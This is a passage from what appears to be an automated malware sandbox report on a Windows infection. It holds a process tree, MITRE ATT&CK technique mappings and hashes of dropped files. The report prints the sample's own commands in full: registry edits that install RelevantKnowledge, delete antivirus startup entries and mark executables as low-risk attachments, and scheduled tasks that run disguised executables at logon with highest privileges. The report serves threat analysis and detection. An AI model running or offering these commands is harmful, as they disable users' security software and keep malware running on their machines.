-uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                    4⤵
                      PID:3880
              • C:\Users\Admin\AppData\Local\Temp\E4CB.exe
                C:\Users\Admin\AppData\Local\Temp\E4CB.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:424
                • C:\Users\Admin\AppData\Local\Temp\E4CB.exe
                  C:\Users\Admin\AppData\Local\Temp\E4CB.exe
                  2⤵
                    PID:4640
                  • C:\Users\Admin\AppData\Local\Temp\E4CB.exe
                    C:\Users\Admin\AppData\Local\Temp\E4CB.exe
                    2⤵
                    • Executes dropped EXE
                    PID:4648
                • C:\Users\Admin\AppData\Local\Temp\EEDE.exe
                  C:\Users\Admin\AppData\Local\Temp\EEDE.exe
                  1⤵
                  • Executes dropped EXE
                  PID:996
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 732
                    2⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3864
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 744
                    2⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:384
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 748
                    2⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:416
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 908
                    2⤵
                    • Program crash
                    PID:2812
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 852
                    2⤵
                    • Suspicious use of NtCreateProcessExOtherParentProcess
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3196
                • C:\Users\Admin\AppData\Local\Temp\F008.exe
                  C:\Users\Admin\AppData\Local\Temp\F008.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1840
                • C:\Users\Admin\AppData\Local\Temp\F151.exe
                  C:\Users\Admin\AppData\Local\Temp\F151.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:544
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                    PID:1188
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    1⤵
                      PID:1908
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:2016
                      • C:\Windows\explorer.exe
                        C:\Windows\explorer.exe
                        1⤵
                          PID:204
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2160
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:3356
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2812
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:4180
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:4352
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\WindowsHolographicDevices\SpatialStore\explorer.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:5056
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Prefetch\ReadyBoot\WmiPrvSE.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:5104
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\shellstyle\RuntimeBroker.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:5024
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\mfvdsp\RuntimeBroker.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:4112
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "HostData" /sc ONLOGON /tr "'C:\ProgramData\Systemd\process\HostData.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:4288
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\GUM18A1.tmp\explorer.exe'" /rl HIGHEST /f
                                1⤵
                                • Process spawned unexpected child process
                                • Creates scheduled task(s)
                                PID:4384

                              Network

                              MITRE ATT&CK Matrix ATT&CK v6

                              Initial Access

                              Execution

                              Scheduled Task

                              1
                              T1053

                              Persistence

                              Modify Existing Service

                              1
                              T1031

                              Registry Run Keys / Startup Folder

                              1
                              T1060

                              Scheduled Task

                              1
                              T1053

                              Privilege Escalation

                              Scheduled Task

                              1
                              T1053

                              Defense Evasion

                              Modify Registry

                              3
                              T1112

                              Disabling Security Tools

                              1
                              T1089

                              Virtualization/Sandbox Evasion

                              1
                              T1497

                              Install Root Certificate

                              1
                              T1130

                              Credential Access

                              Credentials in Files

                              3
                              T1081

                              Discovery

                              Query Registry

                              4
                              T1012

                              Virtualization/Sandbox Evasion

                              1
                              T1497

                              System Information Discovery

                              4
                              T1082

                              Peripheral Device Discovery

                              1
                              T1120

                              Lateral Movement

                              Collection

                              Data from Local System

                              3
                              T1005

                              Exfiltration

                              Command and Control

                              Web Service

                              1
                              T1102

                              Impact

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\Database.exe
                                MD5

                                30f0a5fe731fd2735b8c196fd0fe91cf

                                SHA1

                                2eb63724fd11bf8e082bcd99301654111ad0d831

                                SHA256

                                13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06

                                SHA512

                                acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62

                                Download Submit
                              • C:\ProgramData\Data\install.exe
                                MD5

                                3319cb474eaa2f3812956b271ff29635

                                SHA1

                                74fbed926e8de14fa5eb6a5a47fb873def72fb81

                                SHA256

                                79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                                SHA512

                                c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                                Download Submit
                              • C:\ProgramData\Data\install.exe
                                MD5

                                3319cb474eaa2f3812956b271ff29635

                                SHA1

                                74fbed926e8de14fa5eb6a5a47fb873def72fb81

                                SHA256

                                79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a

                                SHA512

                                c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347

                                Download Submit
                              • C:\ProgramData\Runtimebroker.exe
                                MD5

                                18a8b5b368a74edbbd7fbc584dff41fc

                                SHA1

                                160ff208a2402b4aa858aa7d8d2d0420f8cd434f

                                SHA256

                                36fdfa6d3688a58281fdddf19bc7cce2e292655f2ab63a3cb34f2de65064e9a5

                                SHA512

                                95fd411cfb7ecfe9b4a3f6495d39f8cff998fe27f76ef08df5ff7373dc250be1d2471dc1c2d14be532362df1744ed66df51e54a3a339e5a0ae1c0b56bf2fd734

                                Download Submit
                              • C:\ProgramData\Runtimebroker.exe
                                MD5

                                18a8b5b368a74edbbd7fbc584dff41fc

                                SHA1

                                160ff208a2402b4aa858aa7d8d2d0420f8cd434f

                                SHA256

                                36fdfa6d3688a58281fdddf19bc7cce2e292655f2ab63a3cb34f2de65064e9a5

                                SHA512

                                95fd411cfb7ecfe9b4a3f6495d39f8cff998fe27f76ef08df5ff7373dc250be1d2471dc1c2d14be532362df1744ed66df51e54a3a339e5a0ae1c0b56bf2fd734

                                Download Submit
                              • C:\ProgramData\Systemd\HostData.exe
                                MD5

                                cbf26c74a0a12b5f17ba7596ff6ad19f

                                SHA1

                                6dc733432c290f1fbf5ddda2571b7f538445202b

                                SHA256

                                095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                                SHA512

                                8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                                Download Submit
                              • C:\ProgramData\Systemd\HostData.exe
                                MD5

                                cbf26c74a0a12b5f17ba7596ff6ad19f

                                SHA1

                                6dc733432c290f1fbf5ddda2571b7f538445202b

                                SHA256

                                095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983

                                SHA512

                                8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b

                                Download Submit
                              • C:\ProgramData\Systemd\config.json
                                MD5

                                a285ac140c8c6806223bfdc02302173e

                                SHA1

                                06ca61cae058c568860858e49615d04dc4a8820d

                                SHA256

                                36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb

                                SHA512

                                f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                MD5

                                6bf0e5945fb9da68e1b03bdaed5f6f8d

                                SHA1

                                eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                SHA256

                                dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                SHA512

                                977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                MD5

                                def932bd524a419d0923a3a2dce61559

                                SHA1

                                afa4288a65078cd238fac9f839599b31971d40f6

                                SHA256

                                010643d8c2bcedc89df72595306079f696b08af68d6bb29970eb974ebb2c7462

                                SHA512

                                4f8078ce2f4b33d7084be5bf7f83af8e7753fcd0743097550ed4f7f6a124fe7d7aa4de44da238310a47c70d478a599e1c67d96c8150102f6dddd787ac7e789b9

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                MD5

                                dfd2074552d6e283085d90d5b5fa9bd2

                                SHA1

                                e2a40ac7d7ab5121b339a2f3c0774b99ed8f341e

                                SHA256

                                b7494c8d45f69a627c10cef305ce98257c67847b4f5235c9093a537a96d8cd8b

                                SHA512

                                8003c9bbd36feb3b431ca7a1cf2ff7a225eef1f1a664fb57ed1a3f32873b94158b3f65b89cbf5d2c615a54c86149bf65b202b1eb6490bcace1a22f313e201ceb

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Temp\C8A5.exe
                                MD5

                                e987477b0d14b6d7075f0105aa28ba92

                                SHA1

                                54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                                SHA256

                                4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                                SHA512

                                bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Temp\C8A5.exe
                                MD5

                                e987477b0d14b6d7075f0105aa28ba92

                                SHA1

                                54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                                SHA256

                                4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                                SHA512

                                bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Temp\C8A5.exe
                                MD5

                                e987477b0d14b6d7075f0105aa28ba92

                                SHA1

                                54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab

                                SHA256

                                4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b

                                SHA512

                                bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68

                                Download Submit
                              • C:\Users\Admin\AppData\Local\Temp\D6BF.exe
                                MD5

                                49f58a80993170b4351014d0b5068897

                                SHA1

                                7af2615ec10821cbefb55c602b270c27fa1d6806

                                SHA256

                                905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c

                                SHA512

